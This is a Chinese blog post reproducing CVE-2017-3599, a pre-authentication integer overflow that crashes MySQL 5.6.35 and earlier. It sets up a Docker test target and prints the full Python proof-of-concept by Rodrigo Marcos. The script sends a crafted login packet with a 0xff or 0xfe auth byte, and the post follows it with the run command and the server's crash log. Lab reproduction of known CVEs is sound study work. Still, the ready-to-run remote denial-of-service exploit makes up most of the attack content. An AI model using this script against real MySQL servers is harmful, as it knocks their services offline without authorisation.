CVE-2017-3599漏洞复现

CVE-2017-3599漏洞复现

首次发表于个人网站:https://yumlii33.github.io/

参考链接

MySQL < 5.6.35 / < 5.7.17 - Integer Overflow - Multiple dos Exploit

漏洞说明

Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily “exploitable” vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.

被测环境

  • docker镜像:mysql:5.6.35
  • 启动被测环境容器:docker run -d -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 pmysql:5.6.35

POC脚本

# python2.7

'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket 
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)

else:
    HOST = sys.argv[1]

    if len(sys.argv)>2:
        PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
    else:
        PORT = 3306

print "[+] Creating packet..."

'''
3 bytes		Packet lenth
1 bytes 	Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)

packet_auth  = '\xff'			# both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "[+] Connected."

except:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."	
    s.close()
    print "[+] Exiting."
    exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()

攻击执行

python poc.py IP 3306

攻击效果

拒绝服务,查看数据库的容器日志:

root@yml-penetration:~/Workspace/cve-2017-3599# docker logs 100
Initializing database
2023-12-19 12:19:33 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:33 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 36 ...
2023-12-19 12:19:33 36 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:33 36 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:33 36 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:33 36 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:33 36 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:33 36 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:33 36 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:33 36 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:33 36 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:33 36 [Note] InnoDB: The first specified data file ./ibdata1 did not exist: a new database to be created!
2023-12-19 12:19:33 36 [Note] InnoDB: Setting file ./ibdata1 size to 12 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Database physically writes the file full: wait...
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile101 size to 48 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile1 size to 48 MB
2023-12-19 12:19:34 36 [Note] InnoDB: Renaming log file ./ib_logfile101 to ./ib_logfile0
2023-12-19 12:19:34 36 [Warning] InnoDB: New log files created, LSN=45781
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer not found: creating new
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer created
2023-12-19 12:19:34 36 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:34 36 [Warning] InnoDB: Creating foreign key constraint system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Foreign key constraint system tables created
2023-12-19 12:19:34 36 [Note] InnoDB: Creating tablespace and datafile system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Tablespace and datafile system tables created.
2023-12-19 12:19:34 36 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:34 36 [Note] InnoDB: 5.6.35 started; log sequence number 0
2023-12-19 12:19:36 36 [Note] Binlog end
2023-12-19 12:19:36 36 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:36 36 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:38 36 [Note] InnoDB: Shutdown completed; log sequence number 1625977


2023-12-19 12:19:38 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:38 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 59 ...
2023-12-19 12:19:38 59 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:38 59 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:38 59 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:38 59 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:38 59 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:38 59 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:38 59 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:38 59 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:38 59 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:38 59 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:38 59 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:38 59 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:38 59 [Note] InnoDB: 5.6.35 started; log sequence number 1625977
2023-12-19 12:19:38 59 [Note] Binlog end
2023-12-19 12:19:38 59 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:38 59 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:40 59 [Note] InnoDB: Shutdown completed; log sequence number 1625987




PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:

/usr/bin/mysqladmin -u root password 'new-password'
/usr/bin/mysqladmin -u root -h 100bfe039d09 password 'new-password'

Alternatively you can run:

/usr/bin/mysql_secure_installation

which will also give you the option of removing the test
databases and anonymous user created by default.  This is
strongly recommended for production servers.

See the manual for more instructions.

Please report any problems at http://bugs.mysql.com/

The latest information about MySQL is available on the web at

http://www.mysql.com

Support MySQL by buying support/licenses at http://shop.mysql.com

Note: new default config file not created.
Please make sure your config file is current

WARNING: Default config file /etc/mysql/my.cnf exists on the system
This file will be read by default by the MySQL server
If you do not want to use this, either remove it, or use the
--defaults-file argument to mysqld_safe when starting the server

Database initialized
MySQL init process in progress...
2023-12-19 12:19:40 0 [Note] mysqld (mysqld 5.6.35) starting as process 87 ...
2023-12-19 12:19:40 87 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:40 87 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:40 87 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:40 87 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:40 87 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:40 87 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:40 87 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:40 87 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:40 87 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:40 87 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:40 87 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:40 87 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:40 87 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:40 87 [Note] InnoDB: 5.6.35 started; log sequence number 1625987
2023-12-19 12:19:40 87 [Warning] No existing UUID has been found, so we assume that this is the first time that this server has been started. Generating a new UUID: e27a6a12-9e68-11ee-867c-0242ac110002.
2023-12-19 12:19:40 87 [Warning] 'user' entry 'root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'user' entry '@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:40 87 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 0  MySQL Community Server (GPL)
Warning: Unable to load '/usr/share/zoneinfo/iso3166.tab' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/leap-seconds.list' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/zone.tab' as time zone. Skipping it.
2023-12-19 12:19:42 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.

2023-12-19 12:19:42 87 [Note] mysqld: Normal shutdown

2023-12-19 12:19:42 87 [Note] Giving 0 client threads a chance to die gracefully
2023-12-19 12:19:42 87 [Note] Event Scheduler: Purging the queue. 0 events
2023-12-19 12:19:42 87 [Note] Shutting down slave threads
2023-12-19 12:19:42 87 [Note] Forcefully disconnecting 0 remaining clients
2023-12-19 12:19:42 87 [Note] Binlog end
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'partition'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_DATAFILES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESPACES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN_COLS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FIELDS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_COLUMNS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_INDEXES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESTATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_TABLE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_CACHE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_CONFIG'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_BEING_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DEFAULT_STOPWORD'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_METRICS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_POOL_STATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE_LRU'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCK_WAITS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCKS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_TRX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'InnoDB'
2023-12-19 12:19:42 87 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:42 87 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:43 87 [Note] InnoDB: Shutdown completed; log sequence number 1625997
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'BLACKHOLE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'ARCHIVE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'PERFORMANCE_SCHEMA'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MRG_MYISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MyISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'CSV'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MEMORY'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'sha256_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_old_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_native_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'binlog'
2023-12-19 12:19:43 87 [Note] mysqld: Shutdown complete


MySQL init process done. Ready for start up.

2023-12-19 12:19:44 0 [Note] mysqld (mysqld 5.6.35) starting as process 1 ...
2023-12-19 12:19:44 1 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:44 1 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:44 1 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:44 1 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:44 1 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:44 1 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:44 1 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:44 1 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:44 1 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:44 1 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:44 1 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:44 1 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:44 1 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:44 1 [Note] InnoDB: 5.6.35 started; log sequence number 1625997
2023-12-19 12:19:44 1 [Note] Server hostname (bind-address): '*'; port: 3306
2023-12-19 12:19:44 1 [Note] IPv6 is available.
2023-12-19 12:19:44 1 [Note]   - '::' resolves to '::';
2023-12-19 12:19:44 1 [Note] Server socket created on IP: '::'.
2023-12-19 12:19:44 1 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:44 1 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:44 1 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server (GPL)
12:21:29 UTC - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help
diagnose the problem, but since we have already crashed, 
something is definitely wrong and this may fail.

key_buffer_size=8388608
read_buffer_size=131072
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to 
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 68108 K  bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x23d86c0
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 7f3ca45a1e98 thread_stack 0x40000
mysqld(my_print_stacktrace+0x2c)[0x8c3d5c]
mysqld(handle_fatal_signal+0x481)[0x661df1]
/lib/x86_64-linux-gnu/libpthread.so.0(+0xf890)[0x7f3ccee40890]
/lib/x86_64-linux-gnu/libc.so.6(memchr+0x78)[0x7f3ccd885cd8]
mysqld[0x672dc4]
mysqld[0x683e2d]
mysqld[0x68433e]
mysqld[0x6730a9]
mysqld[0x6724df]
mysqld(_Z16acl_authenticateP3THDj+0x1bd)[0x68450d]
mysqld[0x6abe17]
mysqld(_Z16login_connectionP3THD+0x42)[0x6acbe2]
mysqld(_Z22thd_prepare_connectionP3THD+0x19)[0x6ad329]
mysqld(_Z24do_handle_one_connectionP3THD+0x11c)[0x6ad49c]
mysqld(handle_one_connection+0x40)[0x6ad570]
mysqld(pfs_spawn_thread+0x146)[0x8fa106]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x8064)[0x7f3ccee39064]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7f3ccd8e962d]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query (0): Connection ID (thread ID): 1
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值